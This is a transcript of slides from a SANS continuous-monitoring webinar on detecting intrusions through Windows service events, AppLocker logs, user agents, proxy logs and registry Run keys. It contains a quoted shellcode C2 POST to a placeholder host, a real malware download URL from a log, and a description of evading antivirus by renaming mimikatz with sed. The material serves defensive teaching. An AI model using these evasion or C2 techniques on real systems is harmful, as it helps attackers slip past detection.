the seamless way continuous monitoring can defend your ... · mandiant m-trends 2015 organizations...
TRANSCRIPT
Continuous Monitoring and Security Operations © SANS, Seth Misenar & Eric Conrad, All Rights Reserved
1
The Seamless Way Continuous Monitoring Can Defend Your
Organization against Cyber Attacks Eric Conrad (GSE #13) Twitter: @eric_conrad
Seth Misenar (GSE #28) Twitter: @sethmisenar
Continuous Monitoring and Security Operations © SANS, Seth Misenar & Eric Conrad, All Rights Reserved
2
Our Approach to Continuous Monitoring
• We will focus on both threats and vulnerabilities, and highlight mitigation – And not monitoring for the sake of checking a box
• We will provide proven winning strategies – For example: tracking Microsoft service creation events
• We will also provide proper focus to both "what" and "how" – For example, later we will discuss monitoring Windows service
creation events: – PS C:\> Get-WinEvent -FilterHashtable @{logname='system'; id=7030,7045}
Continuous Monitoring and Security Operations © SANS, Seth Misenar & Eric Conrad, All Rights Reserved
3
Mandiant M-Trends 2015
Organizations made some gains, but attackers still had a free rein in breached environments far too long before being detected—a median of 205 days in 2014 vs. 229 days in 2013. At the same time, the number of organizations discovering these intrusions on their own remained largely unchanged. Sixty-nine percent learned of the breach from an outside entity such as law enforcement. That’s up from 67 percent in 2013 and 63 percent in 2012.1
[1] http://cyber.gd/m-trends-2015
Continuous Monitoring and Security Operations © SANS, Seth Misenar & Eric Conrad, All Rights Reserved
4
Let’s Hunt
• Repeat after me: my network is already owned
• A hunt team is dedicated to finding intrusions that have evaded prevention and detection • “If you're not hunting,
you're losing” – Richard Bejtlich
Continuous Monitoring and Security Operations © SANS, Seth Misenar & Eric Conrad, All Rights Reserved
5
A Word on Entropy
• Entropy means disorder – Strong encryption provides a ciphertext with high entropy – Random string: high entropy – Strings like “download” or “files”: lower entropy
• This is important because many types of malware (and penetration testing tools like Metasploit) use randomly-generated strings for directory names, file names, X.509 certificate information, etc. – This is done to avoid simple signature matching on the names
• We can use the malware’s mojo against it by detecting high-entropy: – File names, directory names, X.509 fields, etc.
Continuous Monitoring and Security Operations © SANS, Seth Misenar & Eric Conrad, All Rights Reserved
6
High Entropy Examples
• BlackHole exploit kit:
• Metasploit’s PsExec
exploit:
• Tbot:
Continuous Monitoring and Security Operations © SANS, Seth Misenar & Eric Conrad, All Rights Reserved
7
Mandiant M-Trends 2015 on Mimikatz
In nearly all of our investigations, the victims’ anti-virus software failed to hinder Mimikatz, despite the tool’s wide reach and reputation. Attackers typically modified and recompiled the source code to evade detection.1
[1] http://cyber.gd/m-trends-2015
Continuous Monitoring and Security Operations © SANS, Seth Misenar & Eric Conrad, All Rights Reserved
8
The Sed Persistent Threat (SPT)
• Windows mimikatz binary download – 70% AV detection rate
• Compiled mimikatz binary from source (no changes) – 31% AV detection rate
• Compiled mimidogz binary from source – s/mimikatz/mimidogz/g – 7% AV detection rate
Continuous Monitoring and Security Operations © SANS, Seth Misenar & Eric Conrad, All Rights Reserved
9
This Dog Can Hunt!
Continuous Monitoring and Security Operations © SANS, Seth Misenar & Eric Conrad, All Rights Reserved
10
Whack-a-Mole
• I re-scanned mimidogz a few hours later on Virustotal, and Kaspersky suddenly detected it
• I re-scanned the next morning, and 6 more vendors detected it (13 total)
Continuous Monitoring and Security Operations © SANS, Seth Misenar & Eric Conrad, All Rights Reserved
11
Announcing Mimiyakz: The Sed Persistent Threat (SPT) Strikes Again!
Continuous Monitoring and Security Operations © SANS, Seth Misenar & Eric Conrad, All Rights Reserved
12
Application Whitelisting: The Time has Come
• Blacklisting will always fail vs. a smart attacker • Application Whitelisting is:
– Australian Signals Directorate Control #1 – 20 Critical Security Controls "First Five"
• Make 2015 the year you deploy application whitelisting
Continuous Monitoring and Security Operations © SANS, Seth Misenar & Eric Conrad, All Rights Reserved
13
"Aren't advanced attackers moving towards code and DLL injection…"
• Yes they are – Especially vs. systems that are hardened with
application whitelisting
• The cardinal sin of preventive controls: – Set it and forget it
• Step 1: Deploy application whitelisting (preventive control)
• Step 2: Monitor blocked applications closely and react in real-time (detection FTW!)
Continuous Monitoring and Security Operations © SANS, Seth Misenar & Eric Conrad, All Rights Reserved
14
Tracking Applocker Alerts
• For sites that run Applocker, these events should be monitored
• Audit mode: – 8003: <exe or dll> was allowed to run but would have been
prevented from running if the AppLocker policy were enforced – 8006: <script or msi> was allowed to run but would have
been prevented from running if the AppLocker policy were enforced
• Block/enforce mode: – 8004: <exe or dll> was not allowed to run – 8007: <script or msi> was not allowed to run1
Continuous Monitoring and Security Operations © SANS, Seth Misenar & Eric Conrad, All Rights Reserved
15
Mandiant M-Trends 2015 on Metasploit
• The Metasploit module used in this case was psexec_command, which allows attackers to run commands on the compromised system. The module executes commands as a Windows service. It leaves a number of forensic artifacts in the Windows system-event log.1
[1] http://cyber.gd/m-trends-2015
Continuous Monitoring and Security Operations © SANS, Seth Misenar & Eric Conrad, All Rights Reserved
16
Critical Event 1: Service Creation
• Critical Security Control 14-9: – Monitor for service creation events and enable
process tracking logs. On Windows systems, many attackers use PsExec functionality to spread from system to system. Creation of a service is an unusual event and should be monitored closely. Process tracking is valuable for incident handling.1
• We will demonstrate service creation via PsExec [1] http://cyber.gd/511_465
Continuous Monitoring and Security Operations © SANS, Seth Misenar & Eric Conrad, All Rights Reserved
17
System Event ID 7045 Normal Service Creation
• Services are often created when normal software is installed – This event was caused by installing
WinPcap – Service creation events that occur on
critical systems should be verified against change management requests
• Services created by use of the Sysinternals PsExec command must be verified – Does your policy allow the use of PsExec?
• High-entropy service names are highly suspicious! – Service Name: MmvTBipnvGFMNfUs – Service File Name: %SYSTEMROOT%\llTTAagm.exe
Continuous Monitoring and Security Operations © SANS, Seth Misenar & Eric Conrad, All Rights Reserved
18
Attacker uses Metasploit PsExec Exploit
Continuous Monitoring and Security Operations © SANS, Seth Misenar & Eric Conrad, All Rights Reserved
19
How Does this Differ from Normal PsExec?
• PsExec is a Windows Sysinternals tool
• PsExec functionality has been added to Metasploit – It is easy to spot the difference between the two versions
in Windows event logs
Continuous Monitoring and Security Operations © SANS, Seth Misenar & Eric Conrad, All Rights Reserved
20
System Event ID 7045 Sysinternals vs. Metasploit PsExec
Service Name: PSEXESVC Service File Name:
%SystemRoot%\PSEXESVC.exe Service Type: user mode service Service Start Type: demand start Service Account: LocalSystem Service Name: MIehTND Service File Name:
%SYSTEMROOT%\iRFMmxan.exe Service Type: user mode service Service Start Type: demand start Service Account: LocalSystem
Continuous Monitoring and Security Operations © SANS, Seth Misenar & Eric Conrad, All Rights Reserved
21
System Event ID 7030 Track Errors
• Sysinternals PsExec generates no errors, but Metasploit’s generates Event ID 7030 – The MIehTND service is marked as an interactive service.
However, the system is configured to not allow interactive services. This service may not function properly
Continuous Monitoring and Security Operations © SANS, Seth Misenar & Eric Conrad, All Rights Reserved
22
Mandiant M-Trends 2015 Example C2 via HTTP POST
• The shellcode makes an HTTP POST request to a hard-coded IP address and downloads XOR-encoded shellcode contained within an HTML comment.
POST /evil.txt HTTP/1.0 Accept: */* Content-Length: 32 Content-Type: application/octet-stream User-Agent: Evil_UA_String Host: 1.2.3.4 Pragma: no-cache <POST_DATA>1 [1] http://cyber.gd/m-trends-2015
Continuous Monitoring and Security Operations © SANS, Seth Misenar & Eric Conrad, All Rights Reserved
23
Proxies Rule!
Proxies keep cropping up over and over, because they are fundamentally a sound idea. Every so often someone re-invents the proxy firewall - as a border spam blocker, or a 'web firewall' or an 'application firewall' or 'database gateway' - etc. And these technologies work wonderfully. Why? Because they're a single point where a security-conscious programmer can assess the threat represented by an application protocol, and can put error detection, attack detection, and validity checking in place – Marcus Ranum
Continuous Monitoring and Security Operations © SANS, Seth Misenar & Eric Conrad, All Rights Reserved
24
Proxy Win: Naked Downloads
• Perl script that parsed http proxy logs to identify downloads of EXEs from ‘naked IPs;’ First hit: – 172.17.103.3 - - [19/May/2014:15:48:10 -0400] "GET
http://101.93.59.108/lksdfhwey/r.exe HTTP/1.0" 200 731 TCP_MISS:DIRECT
• “Why is a nursing station downloading software from a former Soviet Union country?” – EXE scanned clean by 2 separate antivirus programs (proxy and desktop)
• PC was compromised, inbound prevention and detection had failed
Continuous Monitoring and Security Operations © SANS, Seth Misenar & Eric Conrad, All Rights Reserved
25
On That Same Note…
• The URL was: – http://101.93.59.108/lksdfhwey/r.exe
• Beyond the naked IP, it illustrates other common malware patterns: – Randomly-generated names, directories, function names,
etc. – 1-character EXE name
• You can automate searches for these patterns!
Continuous Monitoring and Security Operations © SANS, Seth Misenar & Eric Conrad, All Rights Reserved
26
Let’s Track User Agents
• HTTP user agents offer high-value data • User agents are often “fudged” by malware, in
conspicuous ways
Continuous Monitoring and Security Operations © SANS, Seth Misenar & Eric Conrad, All Rights Reserved
27
Common User Agent Substrings
• Mozilla (Most browsers) – User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
• Opera (The Opera browser) – User-Agent: Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14
• Microsoft-CryptoAPI (Windows systems checking CRL servers) – User-Agent: Microsoft-CryptoAPI/6.0
Continuous Monitoring and Security Operations © SANS, Seth Misenar & Eric Conrad, All Rights Reserved
28
Abnormal HTTP User Agents
• These are not normal: – User-Agent: getURLDown – User-Agent: loadMM – User-Agent: POSTtj – User-Agent: Downloader MLR 1.0.0 – User-Agent: FULLSTUFF – User-Agent: GaurdMailRu – User-Agent: GuardMailRu
Continuous Monitoring and Security Operations © SANS, Seth Misenar & Eric Conrad, All Rights Reserved
29
Tracking User Agents
• Our approach: – Configure your proxy to log user agents – Or your NextGen Firewall, or Bro, etc…
• Sort from least common to most common – Inspect the least common
• Sort from longest to shortest – Inspect the shortest
• Is this approach perfect? – Of course some types of malware can evade this check, and/or use actual
legitimate user agent strings – It is a *very* useful approach
Continuous Monitoring and Security Operations © SANS, Seth Misenar & Eric Conrad, All Rights Reserved
30
Our Approach on the Contagio Crimeware Pcap Collection
Continuous Monitoring and Security Operations © SANS, Seth Misenar & Eric Conrad, All Rights Reserved
31
Mandiant M-Trends 2015 on Persistence
• Maintaining persistence has long been a hallmark of APT actors, who work to stay in an environment until they’ve completed their mission. But financial actors have increasingly shown their ability to maintain a low profile. In one case, cyber criminals maintained stealthy persistence using well-known Windows startup registry locations to launch their malware. In another, financial threat actors managed to maintain access to an environment for more than five years. We’ve even seen persistence in financial threat actors trying to get back into an environment after being kicked out.1
[1] http://cyber.gd/m-trends-2015
Continuous Monitoring and Security Operations © SANS, Seth Misenar & Eric Conrad, All Rights Reserved
32
What does a Malicious Startup Registry Key Look Like?
• Attacker view:
• Victim view:
Continuous Monitoring and Security Operations © SANS, Seth Misenar & Eric Conrad, All Rights Reserved
33
Windows Registry Startup Keys
• Query these keys across all Windows systems – HKLM\Software\Microsoft\Windows\CurrentVersion\Run – HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce – HKCU\Software\Microsoft\Windows\CurrentVersion\Run – HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
• Add these (often forgotten) – HKLM\Software\Wow6432node\Microsoft\Windows\CurrentVersion
\Run – HKLM\Software\Wow6432node\Microsoft\Windows\CurrentVersion
\RunOnce
Continuous Monitoring and Security Operations © SANS, Seth Misenar & Eric Conrad, All Rights Reserved
34
Accessing Registry Keys Remotely
• Only HKLM (HKEY Local Machine) and HKCU (HKEY Current User) are available via the remote registry service – HKCU is accessed via "HKU," and requires ".DEFAULT"
added to the path
• Example remote registry commands: C:\> reg query \\<system>\HKLM\Software\Microsoft\Windows\CurrentVersion\Run C:\> reg query \\<system>\HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
Continuous Monitoring and Security Operations © SANS, Seth Misenar & Eric Conrad, All Rights Reserved
35
Example PowerShell Script
• This script uses PowerShell to wrap remote registry queries
Continuous Monitoring and Security Operations © SANS, Seth Misenar & Eric Conrad, All Rights Reserved
36
Next Step: Long Tail Analysis
1. Query all startup registry run keys on all systems
2. Sort in order of duplicates, least to most 3. Then inspect the least frequently seen
startup registry keys – Most organizations find malware
Continuous Monitoring and Security Operations © SANS, Seth Misenar & Eric Conrad, All Rights Reserved
37
Then: Automate
• The first pass may be somewhat time consuming – But worthwhile
• Once that process is complete: – Re-run the script nightly – Report any new entries
• What you will find: – New software installs, both authorized and not – New Malware!
Continuous Monitoring and Security Operations © SANS, Seth Misenar & Eric Conrad, All Rights Reserved
38
Sec511: Continuous Monitoring and Security Operations
Key Topics • Current State Assessment • Endpoint Security
Architecture • Network Security
Architecture • Security Operations
Centers (SOC) • Continuous Security
Monitoring • Network Security
Monitoring
What makes this course special? Authored by two GSEs: Seth Misenar (#28) Eric Conrad (#13) 1st Cyber Defense course with a day 6 D3TF (Design/Detect/Defend the Flag) competition powered by • Twitter: @eric_conrad • @sethmisenar HTTP://SEC511.COM